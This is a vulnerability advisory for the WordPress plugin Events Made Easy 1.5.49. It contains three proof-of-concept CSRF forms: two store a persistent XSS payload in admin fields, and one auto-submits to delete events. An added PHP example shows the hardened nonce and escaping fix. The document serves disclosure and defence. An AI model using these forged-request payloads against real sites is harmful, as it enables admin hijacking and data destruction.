WordPress Events Made Easy 1.5.49 CSRF / XSS

Reported by David Sopas, 17 Oct 2015. Source: packetstorm (packetstormsecurity.com)

Events Made Easy 1.5.49 CSRF / XSS vulnerabilities

Code
Plugin link: https://wordpress.org/plugins/events-made-easy/  
Active Installs: 10,000+  
Version tested: 1.5.49  
CVE Reference: Waiting  
Original advisory:  
https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/  
  
Events Made Easy is a full-featured event management solution for  
WordPress. Events Made Easy supports public, private, draft and  
recurring events, locations management, RSVP (+ optional approval),  
Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy  
you can plan and publish your event, or let people reserve spaces for  
your weekly meetings. You can add events list, calendars and  
description to your blog using multiple sidebar widgets or shortcodes;  
if you are a web designer you can simply employ the template tags  
provided by Events Made Easy.  
  
When playing around with this plugin I noticed a couple of  
vulnerabilities. In my opinion they are critical because they  
could cause damage to a WordPress installation.  
All of them are related to CSRF, where the vendor forgot to place a  
security token (wp_nonce) on the affected forms.  
  
#1 Add template CSRF + Persistent XSS  
  
URL: /wp-admin/admin.php?page=eme-templates  
  
If an authenticated admin clicks the “Add template” button on an HTML  
page containing this code:  
  
<form action="https://victims_website/wp-admin/admin.php?page=eme-templates"  
method="POST">  
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />  
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />  
<input type="hidden" name="format" value="csrf" />  
<input type="submit" name="submit" value="Add template" />  
</form>  
  
It will store a persistent XSS payload in the template description field.  
The payload executes whenever the admin visits the page  
admin.php?page=eme-templates.  
  
Possible attack scenario:  
  
The malicious user checks that Events Made Easy is installed on a  
WordPress installation.  
The malicious user sends the admin a link to a page containing an auto-submit  
form whose XSS vector hijacks the victim's browser.  
The victim visits the page and gets hijacked.  
  
#2 Add Form Field CSRF + Persistent XSS  
  
URL: /wp-admin/admin.php?page=eme-formfields  
  
If an authenticated admin clicks the “Add field” button on an HTML  
page containing this code:  
  
<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields"  
method="POST">  
<input type="hidden" name="eme_admin_action" value="do_addformfield" />  
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />  
<input type="hidden" name="field_type" value="1" />  
<input type="hidden" name="field_info" value="csrf" />  
<input type="hidden" name="field_tags" value="csrf" />  
<input type="submit" name="submit" value="Add field" />  
</form>  
  
The attack scenario is the same as for vulnerability #1; the same  
missing-nonce issue affects the form fields of this plugin.  
  
#3 Remove events older than CSRF  
  
URL: /wp-admin/admin.php?page=eme-cleanup  
  
With this CSRF a malicious user could delete all events older than  
a given period.  
In my proof of concept I used an auto-submit form that could also be  
used in vulnerabilities #1 and #2.  
  
<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup"  
name="dsopas" method="POST">  
<input type="hidden" name="page" value="eme-cleanup" />  
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />  
<input type="hidden" name="eme_number" value="1" />  
<input type="hidden" name="eme_period" value="day" />  
<input type="hidden" name="doaction" value="Apply" />  
</form> <script> document.dsopas.submit(); </script>  
  
Possible attack scenario:  
  
The malicious user checks that Events Made Easy is installed on a  
WordPress installation.  
The malicious user sends the admin a link to the page that has this auto-submit form.  
Without the victim noticing, events older than 1 day will be removed.  
  
Solution:  
The vendor launched a patched version, 1.5.50, within a matter of hours.  
He was also kind enough to put my name on the changelog.  
  
-David Sopas  
davidsopas.com  
@dsopas  
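The root cause named in the advisory is a missing wp_nonce on the admin forms, combined with unescaped output of the stored value. As an added illustration (not the plugin's actual code), the following PHP shows the unprotected handler shape beside a hardened version for the "Add template" request; the field names come from the advisory, while the `eme_demo_*` function names, the nonce action `eme_demo_add_template` and the option name `eme_demo_templates` are assumptions.

```php
<?php
// Added example (not the plugin's code): the missing-nonce pattern the
// advisory describes, beside a hardened handler for the same request.
// Field names come from the advisory; nonce/action names are assumed.

function eme_demo_store_template( $description, $format ) {
    $templates   = get_option( 'eme_demo_templates', array() );
    $templates[] = array( 'description' => $description, 'format' => $format );
    update_option( 'eme_demo_templates', $templates );
}

// Vulnerable shape: a POST from any origin is accepted and the raw
// description is stored, to be echoed later into the admin page.
function eme_demo_add_template_vulnerable() {
    if ( isset( $_POST['eme_admin_action'] ) && 'do_addtemplate' === $_POST['eme_admin_action'] ) {
        eme_demo_store_template( $_POST['description'], $_POST['format'] );
    }
}
// Hardened form: wp_nonce_field() emits a per-user, per-action token
// (plus _wp_http_referer) that a cross-site form cannot know.
function eme_demo_render_add_template_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=eme-templates' ) ) . '">';
    wp_nonce_field( 'eme_demo_add_template', 'eme_demo_nonce' );
    echo '<input type="hidden" name="eme_admin_action" value="do_addtemplate" />';
    echo '<input type="text" name="description" />';
    echo '<input type="text" name="format" />';
    submit_button( 'Add template' );
    echo '</form>';
}
// Hardened handler: capability check, nonce check, sanitised input.
function eme_demo_add_template_hardened() {
    if ( ! isset( $_POST['eme_admin_action'] ) || 'do_addtemplate' !== $_POST['eme_admin_action'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops with a 403 if the nonce is missing, expired or for another action.
    check_admin_referer( 'eme_demo_add_template', 'eme_demo_nonce' );
    $description = sanitize_text_field( wp_unslash( $_POST['description'] ?? '' ) );
    $format      = sanitize_text_field( wp_unslash( $_POST['format'] ?? '' ) );
    eme_demo_store_template( $description, $format );
}

// Output side: escape at render time so a stored <svg/onload=...> payload
// is shown as text rather than executed, even if it reached the database.
function eme_demo_print_description( $description ) {
    echo '<td>' . esc_html( $description ) . '</td>';
}
```

The nonce check alone closes the CSRF path for all three issues, since a page on another origin cannot read the token; the output escaping is what turns the stored payload from #1 and #2 into harmless text.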
